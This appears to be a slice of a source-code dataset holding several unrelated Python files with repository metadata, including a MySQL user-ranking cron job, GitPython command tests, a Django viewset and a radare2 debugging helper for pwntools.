# This test should be used to verify correct behaviour of deprecated
# RPC methods with and without the -deprecatedrpc flags. For example:
#
# self.log.info("Make sure that -deprecatedrpc=createmultisig allows it to take addresses")
# assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, [self.nodes[0].getnewaddress()])
# self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
self.log.info("Test validateaddress deprecation")
SOME_ADDRESS = "mnvGjUy3NMj67yJ6gkK5o9e5RS33Z2Vqcu" # This is just some random address to pass as a parameter to validateaddress
dep_validate_address = self.nodes[0].validateaddress(SOME_ADDRESS)
assert "ismine" not in dep_validate_address
not_dep_val = self.nodes[1].validateaddress(SOME_ADDRESS)
assert "ismine" in not_dep_val
self.log.info("Test accounts deprecation")
# The following account RPC methods are deprecated:
# - getaccount
# - getaccountaddress
# - getaddressesbyaccount
# - getreceivedbyaccount
# - listaccouts
# - listreceivedbyaccount
# - move
# - setaccount
#
# The following 'label' RPC methods are usable both with and without the
# -deprecatedrpc=accounts switch enabled.
# - getaddressesbylabel
# - getreceivedbylabel
# - listlabels
# - listreceivedbylabel
# - setlabel
#
address0 = self.nodes[0].getnewaddress()
self.nodes[0].generatetoaddress(101, address0)
self.sync_all()
address1 = self.nodes[1].getnewaddress()
self.nodes[1].generatetoaddress(101, address1)
self.log.info("- getaccount")
assert_raises_rpc_error(-32, "getaccount is deprecated", self.nodes[0].getaccount, address0)
self.nodes[1].getaccount(address1)
self.log.info("- setaccount")
assert_raises_rpc_error(-32, "setaccount is deprecated", self.nodes[0].setaccount, address0, "label0")
self.nodes[1].setaccount(address1, "label1")
self.log.info("- setlabel")
self.nodes[0].setlabel(address0, "label0")
self.nodes[1].setlabel(address1, "label1")
self.log.info("- getaccountaddress")
assert_raises_rpc_error(-32, "getaccountaddress is deprecated", self.nodes[0].getaccountaddress, "label0")
self.nodes[1].getaccountaddress("label1")
self.log.info("- getaddressesbyaccount")
assert_raises_rpc_error(-32, "getaddressesbyaccount is deprecated", self.nodes[0].getaddressesbyaccount, "label0")
self.nodes[1].getaddressesbyaccount("label1")
self.log.info("- getaddressesbylabel")
self.nodes[0].getaddressesbylabel("label0")
self.nodes[1].getaddressesbylabel("label1")
self.log.info("- getreceivedbyaccount")
assert_raises_rpc_error(-32, "getreceivedbyaccount is deprecated", self.nodes[0].getreceivedbyaccount, "label0")
self.nodes[1].getreceivedbyaccount("label1")
self.log.info("- getreceivedbylabel")
self.nodes[0].getreceivedbylabel("label0")
self.nodes[1].getreceivedbylabel("label1")
self.log.info("- listaccounts")
assert_raises_rpc_error(-32, "listaccounts is deprecated", self.nodes[0].listaccounts)
self.nodes[1].listaccounts()
self.log.info("- listlabels")
self.nodes[0].listlabels()
self.nodes[1].listlabels()
self.log.info("- listreceivedbyaccount")
assert_raises_rpc_error(-32, "listreceivedbyaccount is deprecated", self.nodes[0].listreceivedbyaccount)
self.nodes[1].listreceivedbyaccount()
self.log.info("- listreceivedbylabel")
self.nodes[0].listreceivedbylabel()
self.nodes[1].listreceivedbylabel()
self.log.info("- move")
assert_raises_rpc_error(-32, "move is deprecated", self.nodes[0].move, "label0", "label0b", 10)
self.nodes[1].move("label1", "label1b", 10)
if __name__ == '__main__':
DeprecatedRpcTest().main()
| 43.133929
| 137
| 0.677292
|
4a1890a20235727b49650dd84c9a82d5db9ec286
| 6,368
|
py
|
Python
|
stuff/cron/update_user_rank.py
|
categulario/omegaup
|
bfe32b9b4f58743d941f13ea707279885a30567f
|
[
"BSD-3-Clause"
] | 1
|
2018-08-28T22:34:29.000Z
|
2018-08-28T22:34:29.000Z
|
stuff/cron/update_user_rank.py
|
categulario/omegaup
|
bfe32b9b4f58743d941f13ea707279885a30567f
|
[
"BSD-3-Clause"
] | null | null | null |
stuff/cron/update_user_rank.py
|
categulario/omegaup
|
bfe32b9b4f58743d941f13ea707279885a30567f
|
[
"BSD-3-Clause"
] | 1
|
2018-08-28T22:34:31.000Z
|
2018-08-28T22:34:31.000Z
|
#!/usr/bin/python3
'''Updates the user ranking.'''
import argparse
import collections
import configparser
import getpass
import logging
import os
import MySQLdb
Cutoff = collections.namedtuple('Cutoff', ['percentile', 'classname'])
def update_user_rank(cur):
'''Updates the user ranking.'''
cur.execute('DELETE FROM `User_Rank`;')
logging.info('Updating accepted stats for problems...')
cur.execute('''
UPDATE
Problems p
SET
p.accepted = (
SELECT
COUNT(DISTINCT r.identity_id)
FROM
Runs r
WHERE
r.problem_id = p.problem_id AND r.verdict = 'AC'
);
''')
logging.info('Updating user rank...')
cur.execute('''
SELECT
i.username,
i.name,
i.country_id,
i.state_id,
i.school_id,
up.identity_id,
i.user_id,
COUNT(ps.problem_id) problems_solved_count,
SUM(ROUND(100 / LOG(2, ps.accepted+1) , 0)) score
FROM
(
SELECT DISTINCT
r.identity_id,
r.problem_id
FROM
Runs r
WHERE
r.verdict = 'AC' AND r.type = 'normal'
) AS up
INNER JOIN
Problems ps ON ps.problem_id = up.problem_id AND ps.visibility > 0
INNER JOIN
Identities i ON i.identity_id = up.identity_id
INNER JOIN
Users u ON u.user_id = i.user_id
WHERE
u.is_private = 0
GROUP BY
identity_id
ORDER BY
score DESC;
''')
rank = 0
prev_score = None
# MySQL has no good way of obtaining percentiles, so we'll store the sorted
# list of scores in order to calculate the cutoff scores later.
scores = []
for row in cur:
if row['score'] != prev_score:
rank += 1
scores.append(row['score'])
prev_score = row['score']
cur.execute('''
INSERT INTO
User_Rank (user_id, rank, problems_solved_count, score,
username, name, country_id, state_id,
school_id)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s);''',
(row['user_id'], rank, row['problems_solved_count'],
row['score'], row['username'], row['name'],
row['country_id'], row['state_id'], row['school_id']))
return scores
def update_user_rank_cutoffs(cur, scores):
'''Updates the user ranking cutoff table.'''
cur.execute('DELETE FROM `User_Rank_Cutoffs`;')
logging.info('Updating ranking cutoffs...')
cutoffs = [
Cutoff(.01, 'user-rank-international-master'),
Cutoff(.09, 'user-rank-master'),
Cutoff(.15, 'user-rank-expert'),
Cutoff(.35, 'user-rank-specialist'),
Cutoff(.40, 'user-rank-beginner'),
]
if not scores:
return
for cutoff in cutoffs:
# Scores are already in descending order. That will also bias the
# cutoffs towards higher scores.
cur.execute('''
INSERT INTO
User_Rank_Cutoffs (score, percentile, classname)
VALUES(%s, %s, %s);''',
(scores[int(len(scores) * cutoff.percentile)],
cutoff.percentile, cutoff.classname))
def mysql_connect(args):
'''Connects to MySQL with the arguments provided.
Returns a MySQLdb connection.'''
host = args.host
user = args.user
password = args.password
if user is None and os.path.isfile(args.mysql_config_file):
config = configparser.ConfigParser()
config.read(args.mysql_config_file)
# Puppet quotes some configuration entries.
host = config['client']['host'].strip("'")
user = config['client']['user'].strip("'")
password = config['client']['password'].strip("'")
if password is None:
password = getpass.getpass()
assert user is not None, 'Missing --user parameter'
assert host is not None, 'Missing --host parameter'
assert password is not None, 'Missing --password parameter'
return MySQLdb.connect(
host=host,
user=user,
passwd=password,
db=args.database,
)
def main():
'''Main entrypoint.'''
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--mysql-config-file',
default=os.path.join(os.getenv('HOME') or '.',
'.my.cnf'),
help='.my.cnf file that stores credentials')
parser.add_argument('--quiet', '-q', action='store_true',
help='Disables logging')
parser.add_argument('--verbose', '-v', action='store_true',
help='Enables verbose logging')
parser.add_argument('--logfile', type=str, default=None,
help='Enables logging to a file')
parser.add_argument('--host', type=str, help='MySQL host',
default='localhost')
parser.add_argument('--user', type=str, help='MySQL username')
parser.add_argument('--password', type=str, help='MySQL password')
parser.add_argument('--database', type=str, help='MySQL database',
default='omegaup')
args = parser.parse_args()
logging.basicConfig(filename=args.logfile,
format='%%(asctime)s:%s:%%(message)s' % parser.prog,
level=(logging.DEBUG if args.verbose else
logging.INFO if not args.quiet else
logging.ERROR))
logging.info('Started')
dbconn = mysql_connect(args)
try:
with dbconn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cur:
scores = update_user_rank(cur)
update_user_rank_cutoffs(cur, scores)
dbconn.commit()
except: # pylint: disable=bare-except
logging.exception('Failed to update user ranking')
finally:
dbconn.close()
logging.info('Done')
if __name__ == '__main__':
main()
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
| 32.824742
| 79
| 0.549152
|
4a1890af83bf2dc6395fd9ebe6b3903561bdca30
| 3,966
|
py
|
Python
|
cea/analysis/uncertainty/Individual_Evaluation.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
cea/analysis/uncertainty/Individual_Evaluation.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
cea/analysis/uncertainty/Individual_Evaluation.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
"""
This file helps in evaluating individual generation. This will be useful when you need to change the global variables
and see how the objective function value changes.
Do ensure you have the uncertainty.csv which will be obtained by running uncertainty_parameters.py
This is part of the uncertainty analysis
"""
from __future__ import division
import cea.inputlocator
import pandas as pd
import cea.optimization.distribution.network_opt_main as network_opt
import cea.optimization.master.evaluation as evaluation
import json
import csv
from cea.optimization.lca_calculations import lca_calculations
from cea.optimization.prices import Prices as Prices
__author__ = "Sreepathi Bhargava Krishna"
__copyright__ = "Copyright 2017, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Sreepathi Bhargava Krishna"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "thomas@arch.ethz.ch"
__status__ = "Production"
def individual_evaluation(generation, level, size, variable_groups):
"""
:param generation: Generation of the optimization in which the individual evaluation is to be done
:type generation: int
:param level: Number of the uncertain scenario. For each scenario, the objectives are calculated
:type level: int
:param size: Total uncertain scenarios developed. See 'uncertainty.csv'
:type size: int
:return: Function saves the new objectives in a json file
"""
from cea.optimization.preprocessing.preprocessing_main import preproccessing
gv = cea.globalvar.GlobalVariables()
scenario_path = gv.scenario_reference
locator = cea.inputlocator.InputLocator(scenario_path)
config = cea.config.Configuration()
weather_file = locator.get_default_weather()
with open(locator.get_optimization_master_results_folder() + "\CheckPoint_" + str(generation), "rb") as fp:
data = json.load(fp)
pop = data['population']
ntwList = data['networkList']
# # Uncertainty Part
row = []
with open(locator.get_uncertainty_results_folder() + '\uncertainty.csv') as f:
reader = csv.reader(f)
for i in xrange(size+1):
row.append(next(reader))
j = level + 1
for i in xrange(len(row[0])-1):
setattr(gv, row[0][i+1], float(row[j][i+1]))
total_demand = pd.read_csv(locator.get_total_demand())
building_names = total_demand.Name.values
gv.num_tot_buildings = total_demand.Name.count()
lca = lca_calculations(locator, config)
prices = Prices(locator, config)
extra_costs, extra_CO2, extra_primary_energy, solarFeat = preproccessing(locator, total_demand,
building_names,
weather_file, gv)
network_features = network_opt.network_opt_main()
def objective_function(ind, ind_num):
(costs, CO2, prim) = evaluation.evaluation_main(ind, building_names, locator, solarFeat, network_features, gv,
config, prices, lca,
ind_num, generation
)
# print (costs, CO2, prim)
return (costs, CO2, prim)
fitness = []
for i in xrange(gv.initialInd):
evaluation.checkNtw(pop[i], ntwList, locator, gv)
fitness.append(objective_function(pop[i], i))
with open(locator.get_uncertainty_checkpoint(level), "wb") as fp:
cp = dict(population=pop, uncertainty_level=level, population_fitness=fitness)
json.dump(cp, fp)
if __name__ == '__main__':
generation = 50 # generation which you are interested in testing
size = 1000 # number of uncertain scenarios being tested
for i in xrange(size):
individual_evaluation(generation, i, size, variable_groups=('ECONOMIC',))
| 40.469388
| 118
| 0.669692
|
4a1890c8baff409fea52bb01c421d58b6f4ec95b
| 73
|
py
|
Python
|
example_minimal.py
|
fmasdev1/stackoverflow_tag_cloud
|
ab02d0adfa643c84025e98f7251dd587b5aec1df
|
[
"MIT"
] | 22
|
2016-01-12T15:36:28.000Z
|
2020-06-24T22:45:43.000Z
|
example_minimal.py
|
fmasdev1/stackoverflow_tag_cloud
|
ab02d0adfa643c84025e98f7251dd587b5aec1df
|
[
"MIT"
] | 2
|
2019-06-05T08:05:11.000Z
|
2021-11-03T11:29:22.000Z
|
example_minimal.py
|
fmasdev1/stackoverflow_tag_cloud
|
ab02d0adfa643c84025e98f7251dd587b5aec1df
|
[
"MIT"
] | 12
|
2017-10-13T10:41:23.000Z
|
2022-01-03T19:48:24.000Z
|
from stackoverflow_users_taginfo import tag_cloud
tag_cloud(link=22656)
| 18.25
| 49
| 0.876712
|
4a18922d4f361bb7c09afaa33536dedc96f3584a
| 141
|
py
|
Python
|
crm_th/clievents/views.py
|
covrom/django_sample
|
f659588373fe8c95939b3ef14d2733d6b95384ba
|
[
"MIT"
] | null | null | null |
crm_th/clievents/views.py
|
covrom/django_sample
|
f659588373fe8c95939b3ef14d2733d6b95384ba
|
[
"MIT"
] | null | null | null |
crm_th/clievents/views.py
|
covrom/django_sample
|
f659588373fe8c95939b3ef14d2733d6b95384ba
|
[
"MIT"
] | null | null | null |
from material.frontend.views import ModelViewSet
from . import models
class SpectacleViewSet(ModelViewSet):
model = models.Spectacle
| 15.666667
| 48
| 0.794326
|
4a189267ed368b204e6bf0a6d2f74c812549ec0b
| 11,154
|
py
|
Python
|
lib/third_party/GitPython/git/test/test_git.py
|
magnetic-lab/tdgg
|
3a80ed82f4b6d1cd2e7a127e079a27141b2e0422
|
[
"MIT"
] | 5
|
2019-08-14T07:24:10.000Z
|
2020-04-15T11:47:48.000Z
|
lib/third_party/GitPython/git/test/test_git.py
|
magnetic-lab/tdgg
|
3a80ed82f4b6d1cd2e7a127e079a27141b2e0422
|
[
"MIT"
] | null | null | null |
lib/third_party/GitPython/git/test/test_git.py
|
magnetic-lab/tdgg
|
3a80ed82f4b6d1cd2e7a127e079a27141b2e0422
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# test_git.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
import os
import subprocess
import sys
from tempfile import TemporaryFile
from git import (
Git,
refresh,
GitCommandError,
GitCommandNotFound,
Repo,
cmd
)
from git.compat import PY3, is_darwin
from git.test.lib import (
TestBase,
patch,
raises,
assert_equal,
assert_true,
assert_match,
fixture_path
)
from git.test.lib import with_rw_directory
from git.util import finalize_process
import os.path as osp
try:
from unittest import mock
except ImportError:
import mock
from git.compat import is_win
class TestGit(TestBase):
@classmethod
def setUpClass(cls):
super(TestGit, cls).setUpClass()
cls.git = Git(cls.rorepo.working_dir)
def tearDown(self):
import gc
gc.collect()
@patch.object(Git, 'execute')
def test_call_process_calls_execute(self, git):
git.return_value = ''
self.git.version()
assert_true(git.called)
assert_equal(git.call_args, ((['git', 'version'],), {}))
def test_call_unpack_args_unicode(self):
args = Git._Git__unpack_args(u'Unicode€™')
if PY3:
mangled_value = 'Unicode\u20ac\u2122'
else:
mangled_value = 'Unicode\xe2\x82\xac\xe2\x84\xa2'
assert_equal(args, [mangled_value])
def test_call_unpack_args(self):
args = Git._Git__unpack_args(['git', 'log', '--', u'Unicode€™'])
if PY3:
mangled_value = 'Unicode\u20ac\u2122'
else:
mangled_value = 'Unicode\xe2\x82\xac\xe2\x84\xa2'
assert_equal(args, ['git', 'log', '--', mangled_value])
@raises(GitCommandError)
def test_it_raises_errors(self):
self.git.this_does_not_exist()
def test_it_transforms_kwargs_into_git_command_arguments(self):
assert_equal(["-s"], self.git.transform_kwargs(**{'s': True}))
assert_equal(["-s", "5"], self.git.transform_kwargs(**{'s': 5}))
assert_equal([], self.git.transform_kwargs(**{'s': None}))
assert_equal(["--max-count"], self.git.transform_kwargs(**{'max_count': True}))
assert_equal(["--max-count=5"], self.git.transform_kwargs(**{'max_count': 5}))
assert_equal(["--max-count=0"], self.git.transform_kwargs(**{'max_count': 0}))
assert_equal([], self.git.transform_kwargs(**{'max_count': None}))
# Multiple args are supported by using lists/tuples
assert_equal(["-L", "1-3", "-L", "12-18"], self.git.transform_kwargs(**{'L': ('1-3', '12-18')}))
assert_equal(["-C", "-C"], self.git.transform_kwargs(**{'C': [True, True, None, False]}))
# order is undefined
res = self.git.transform_kwargs(**{'s': True, 't': True})
self.assertEqual({'-s', '-t'}, set(res))
def test_it_executes_git_to_shell_and_returns_result(self):
assert_match(r'^git version [\d\.]{2}.*$', self.git.execute(["git", "version"]))
def test_it_accepts_stdin(self):
filename = fixture_path("cat_file_blob")
with open(filename, 'r') as fh:
assert_equal("70c379b63ffa0795fdbfbc128e5a2818397b7ef8",
self.git.hash_object(istream=fh, stdin=True))
@patch.object(Git, 'execute')
def test_it_ignores_false_kwargs(self, git):
# this_should_not_be_ignored=False implies it *should* be ignored
self.git.version(pass_this_kwarg=False)
assert_true("pass_this_kwarg" not in git.call_args[1])
@raises(GitCommandError)
def test_it_raises_proper_exception_with_output_stream(self):
tmp_file = TemporaryFile()
self.git.checkout('non-existent-branch', output_stream=tmp_file)
def test_it_accepts_environment_variables(self):
filename = fixture_path("ls_tree_empty")
with open(filename, 'r') as fh:
tree = self.git.mktree(istream=fh)
env = {
'GIT_AUTHOR_NAME': 'Author Name',
'GIT_AUTHOR_EMAIL': 'author@example.com',
'GIT_AUTHOR_DATE': '1400000000+0000',
'GIT_COMMITTER_NAME': 'Committer Name',
'GIT_COMMITTER_EMAIL': 'committer@example.com',
'GIT_COMMITTER_DATE': '1500000000+0000',
}
commit = self.git.commit_tree(tree, m='message', env=env)
assert_equal(commit, '4cfd6b0314682d5a58f80be39850bad1640e9241')
def test_persistent_cat_file_command(self):
# read header only
import subprocess as sp
hexsha = "b2339455342180c7cc1e9bba3e9f181f7baa5167"
g = self.git.cat_file(batch_check=True, istream=sp.PIPE, as_process=True)
g.stdin.write(b"b2339455342180c7cc1e9bba3e9f181f7baa5167\n")
g.stdin.flush()
obj_info = g.stdout.readline()
# read header + data
g = self.git.cat_file(batch=True, istream=sp.PIPE, as_process=True)
g.stdin.write(b"b2339455342180c7cc1e9bba3e9f181f7baa5167\n")
g.stdin.flush()
obj_info_two = g.stdout.readline()
self.assertEqual(obj_info, obj_info_two)
# read data - have to read it in one large chunk
size = int(obj_info.split()[2])
g.stdout.read(size)
g.stdout.read(1)
# now we should be able to read a new object
g.stdin.write(b"b2339455342180c7cc1e9bba3e9f181f7baa5167\n")
g.stdin.flush()
self.assertEqual(g.stdout.readline(), obj_info)
# same can be achieved using the respective command functions
hexsha, typename, size = self.git.get_object_header(hexsha)
hexsha, typename_two, size_two, data = self.git.get_object_data(hexsha) # @UnusedVariable
self.assertEqual(typename, typename_two)
self.assertEqual(size, size_two)
def test_version(self):
v = self.git.version_info
self.assertIsInstance(v, tuple)
for n in v:
self.assertIsInstance(n, int)
# END verify number types
def test_cmd_override(self):
prev_cmd = self.git.GIT_PYTHON_GIT_EXECUTABLE
exc = GitCommandNotFound
try:
# set it to something that doens't exist, assure it raises
type(self.git).GIT_PYTHON_GIT_EXECUTABLE = osp.join(
"some", "path", "which", "doesn't", "exist", "gitbinary")
self.failUnlessRaises(exc, self.git.version)
finally:
type(self.git).GIT_PYTHON_GIT_EXECUTABLE = prev_cmd
# END undo adjustment
def test_refresh(self):
# test a bad git path refresh
self.assertRaises(GitCommandNotFound, refresh, "yada")
# test a good path refresh
which_cmd = "where" if is_win else "which"
path = os.popen("{0} git".format(which_cmd)).read().strip().split('\n')[0]
refresh(path)
def test_options_are_passed_to_git(self):
# This work because any command after git --version is ignored
git_version = self.git(version=True).NoOp()
git_command_version = self.git.version()
self.assertEquals(git_version, git_command_version)
def test_persistent_options(self):
git_command_version = self.git.version()
# analog to test_options_are_passed_to_git
self.git.set_persistent_git_options(version=True)
git_version = self.git.NoOp()
self.assertEquals(git_version, git_command_version)
# subsequent calls keep this option:
git_version_2 = self.git.NoOp()
self.assertEquals(git_version_2, git_command_version)
# reset to empty:
self.git.set_persistent_git_options()
self.assertRaises(GitCommandError, self.git.NoOp)
def test_single_char_git_options_are_passed_to_git(self):
input_value = 'TestValue'
output_value = self.git(c='user.name=%s' % input_value).config('--get', 'user.name')
self.assertEquals(input_value, output_value)
def test_change_to_transform_kwargs_does_not_break_command_options(self):
self.git.log(n=1)
def test_insert_after_kwarg_raises(self):
# This isn't a complete add command, which doesn't matter here
self.failUnlessRaises(ValueError, self.git.remote, 'add', insert_kwargs_after='foo')
def test_env_vars_passed_to_git(self):
editor = 'non_existent_editor'
with mock.patch.dict('os.environ', {'GIT_EDITOR': editor}): # @UndefinedVariable
self.assertEqual(self.git.var("GIT_EDITOR"), editor)
@with_rw_directory
def test_environment(self, rw_dir):
# sanity check
self.assertEqual(self.git.environment(), {})
# make sure the context manager works and cleans up after itself
with self.git.custom_environment(PWD='/tmp'):
self.assertEqual(self.git.environment(), {'PWD': '/tmp'})
self.assertEqual(self.git.environment(), {})
old_env = self.git.update_environment(VARKEY='VARVALUE')
# The returned dict can be used to revert the change, hence why it has
# an entry with value 'None'.
self.assertEqual(old_env, {'VARKEY': None})
self.assertEqual(self.git.environment(), {'VARKEY': 'VARVALUE'})
new_env = self.git.update_environment(**old_env)
self.assertEqual(new_env, {'VARKEY': 'VARVALUE'})
self.assertEqual(self.git.environment(), {})
path = osp.join(rw_dir, 'failing-script.sh')
with open(path, 'wt') as stream:
stream.write("#!/usr/bin/env sh\n"
"echo FOO\n")
os.chmod(path, 0o777)
rw_repo = Repo.init(osp.join(rw_dir, 'repo'))
remote = rw_repo.create_remote('ssh-origin', "ssh://git@server/foo")
with rw_repo.git.custom_environment(GIT_SSH=path):
try:
remote.fetch()
except GitCommandError as err:
if sys.version_info[0] < 3 and is_darwin:
self.assertIn('ssh-orig, ' in str(err))
self.assertEqual(err.status, 128)
else:
self.assertIn('FOO', str(err))
def test_handle_process_output(self):
from git.cmd import handle_process_output
line_count = 5002
count = [None, 0, 0]
def counter_stdout(line):
count[1] += 1
def counter_stderr(line):
count[2] += 1
cmdline = [sys.executable, fixture_path('cat_file.py'), str(fixture_path('issue-301_stderr'))]
proc = subprocess.Popen(cmdline,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
creationflags=cmd.PROC_CREATIONFLAGS,
)
handle_process_output(proc, counter_stdout, counter_stderr, finalize_process)
self.assertEqual(count[1], line_count)
self.assertEqual(count[2], line_count)
| 37.555556
| 104
| 0.630536
|
4a18928192864cdeef25d0259df90af1834eee65
| 1,677
|
py
|
Python
|
setup.py
|
autorope/donkeybarn
|
f7e985e850dea3c2a4352e00cb6337a9ab357113
|
[
"MIT"
] | 4
|
2019-01-05T04:43:04.000Z
|
2021-04-05T11:54:20.000Z
|
setup.py
|
autorope/donkeybarn
|
f7e985e850dea3c2a4352e00cb6337a9ab357113
|
[
"MIT"
] | null | null | null |
setup.py
|
autorope/donkeybarn
|
f7e985e850dea3c2a4352e00cb6337a9ab357113
|
[
"MIT"
] | 2
|
2019-01-05T04:43:05.000Z
|
2019-11-08T02:17:29.000Z
|
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
setup(name='donkeybarn',
version='0.0.1',
description='Functions to train advanced donkeycar autopilots.',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/autorope/donkeycar',
author='Will Roscoe',
author_email='wroscoe@gmail.com',
license='MIT',
install_requires=['numpy',
'pandas',
'docopt',
'requests',
'h5py',
'moviepy',
'joblib',
'tqdm',
],
include_package_data=True,
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.6',
],
keywords='selfdriving cars donkeycar diyrobocars',
packages=find_packages(exclude=(['tests', 'docs', 'site', 'env'])),
)
| 30.490909
| 79
| 0.550388
|
4a1894ab2bfdc37571341674a81610217efafdcf
| 3,499
|
py
|
Python
|
Source/Utilities/Collection.py
|
Dmunch04/SquareIt
|
0379b208afa397b349c119f15e2611ec93f3bedb
|
[
"MIT"
] | 1
|
2019-07-01T10:07:30.000Z
|
2019-07-01T10:07:30.000Z
|
Source/Utilities/Collection.py
|
Dmunch04/SquareIt
|
0379b208afa397b349c119f15e2611ec93f3bedb
|
[
"MIT"
] | null | null | null |
Source/Utilities/Collection.py
|
Dmunch04/SquareIt
|
0379b208afa397b349c119f15e2611ec93f3bedb
|
[
"MIT"
] | null | null | null |
from DavesLogger import Logs
class Collection (dict):
__slots__ = (
'Instance',
'Index'
)
def __init__ (self, Instance = dict, Indexor = 'ID'):
dict.__init__ (self)
self.Instance = Instance
self.Index = Indexor
def __add__ (self, _Value):
""" Adds support for using + on this """
if isinstance (_Value, Collection):
if isinstance (_Value.Instance, self.Instance):
[self.Add (Item) for Item in _Value]
elif isinstance (_Value, self.Instance):
self.Add (_Value)
else:
raise Logs.Error ('Item is not a collection or instance of')
def __iadd__ (self, _Value):
""" Adds support for using += on this """
self.__add__ (_Value)
def __setitem__ (self, _Key, _Value):
""" Adds support for using this[Key] = Value on this """
if not isinstance (_Value, self.Instance):
Logs.Error (f'{_Value} is not instance of {self.Instance}!')
dict.__setitem__ (self, _Key, _Value)
def Add (self, _Item):
""" Adds a new item to the collection """
if not isinstance (_Item, self.Instance):
Logs.Error (f'{_Item} is not instance of {self.Instance}!')
Index = getattr (_Item, self.Index, None)
if Index is None:
Logs.Error (f'{self.Index} of {repr (_Item)} is invalid!')
self[Index] = _Item
def Remove (self, _Item):
""" Removes an item from the collection """
if isinstance (_Item, self.Instance):
if getattr (_Item, self.Index, None) is not None:
del self[getattr (_Item, self.Index)]
else:
if _Item in self:
del self[_Item]
def RemoveIf (self, **_Attributes):
""" Removes an item from the collection, if something """
for Key, Value in reversed (self.items ()):
if self.HasAttributes (_Value, **_Attributes):
del self[Key]
def RemoveIndex (self, _Index):
""" Removes an item from the collection, by it's id """
del self[_Index]
def HasAttributes (self, _Object, **_Attributes):
""" Checks if _Object has _Attributes """
for Key, Value in _Attributes.items ():
if not getattr (_Object, Key, None) == Value:
return False
return True
def Has (self, _ID):
""" Check if the collection contains an object with the given id """
if isinstance (_Key, self.Instance):
return self.__contains__ (_ID)
for Item in self:
if getattr (Item, self.Index, None) == _ID:
return True
return False
def Find (self, _Condition):
""" Find all objects which meets the callable condition """
return [Item for Item in self if _Condition (Item)]
def FindOne (self, _Condition):
""" Find first object which meets the callable condition """
for Item in self:
if _Condition (Item):
return _Item
def Get (self, _ID = None, **_Attributes):
""" Get an item from the collection by it's id, an attributes to filter """
_Attributes['ID'] = _ID or _Attributes.get ('ID')
return self.FindOne (lambda X: self.HasAttributes (X, **_Attributes))
def GetAll (self):
""" Returns all the items in the collection as a list """
return [self[Item] for Item in self]
| 28.917355
| 83
| 0.573307
|
4a18950feb0906748d9b4bcbf52153c572f6c01f
| 130
|
py
|
Python
|
test/py/largrid-tests.py
|
cvdlab/lar-cc
|
7092965acf7c0c78a5fab4348cf2c2aa01c4b130
|
[
"MIT",
"Unlicense"
] | 1
|
2016-09-20T04:48:12.000Z
|
2016-09-20T04:48:12.000Z
|
test/py/largrid-tests.py
|
Ahdhn/lar-cc
|
7092965acf7c0c78a5fab4348cf2c2aa01c4b130
|
[
"MIT",
"Unlicense"
] | 1
|
2018-02-20T21:57:07.000Z
|
2018-02-21T07:18:11.000Z
|
test/py/largrid-tests.py
|
Ahdhn/lar-cc
|
7092965acf7c0c78a5fab4348cf2c2aa01c4b130
|
[
"MIT",
"Unlicense"
] | 7
|
2016-11-04T10:47:42.000Z
|
2018-04-10T17:32:50.000Z
|
import os
def createDir(dirpath):
if not os.path.exists(dirpath):
os.makedirs(dirpath)
createDir('test/py/largrid/')
| 18.571429
| 35
| 0.692308
|
4a18958d76f5163a2f72010050914318d882acb0
| 360
|
py
|
Python
|
r2dbg/__init__.py
|
Enigmatrix/pwntools-dbg-r2
|
042cfb34c1e6eeacf130052722cd95b8c68280de
|
[
"MIT"
] | 2
|
2020-03-05T23:41:47.000Z
|
2020-04-16T09:31:25.000Z
|
r2dbg/__init__.py
|
Enigmatrix/pwntools-dbg-r2
|
042cfb34c1e6eeacf130052722cd95b8c68280de
|
[
"MIT"
] | null | null | null |
r2dbg/__init__.py
|
Enigmatrix/pwntools-dbg-r2
|
042cfb34c1e6eeacf130052722cd95b8c68280de
|
[
"MIT"
] | 1
|
2020-04-16T09:31:38.000Z
|
2020-04-16T09:31:38.000Z
|
from pwn import *
def r2dbg(args, r2script=None, r2port=None, exe=None, ssh=None, env=None, sysroot=None, **kwargs):
gdbscript = ""
if r2port:
gdbscript += "#>port="+str(r2port)+"\n"
if r2script:
gdbscript += '\n'.join("#r2"+c for c in r2script.split('\n'))
return gdb.debug(args, gdbscript, exe, ssh, env, sysroot, **kwargs)
| 32.727273
| 98
| 0.613889
|
4a1895b2973511754fbe196c48a63cc18fa48a84
| 45,310
|
py
|
Python
|
MapasDeCampos_by_hidromod/src/ModuloGeneralReadOptions.py
|
RBCanelas/MOHID_python_tools
|
debddbba4fed0e1eae042eedc1554094bb78a63d
|
[
"MIT"
] | null | null | null |
MapasDeCampos_by_hidromod/src/ModuloGeneralReadOptions.py
|
RBCanelas/MOHID_python_tools
|
debddbba4fed0e1eae042eedc1554094bb78a63d
|
[
"MIT"
] | null | null | null |
MapasDeCampos_by_hidromod/src/ModuloGeneralReadOptions.py
|
RBCanelas/MOHID_python_tools
|
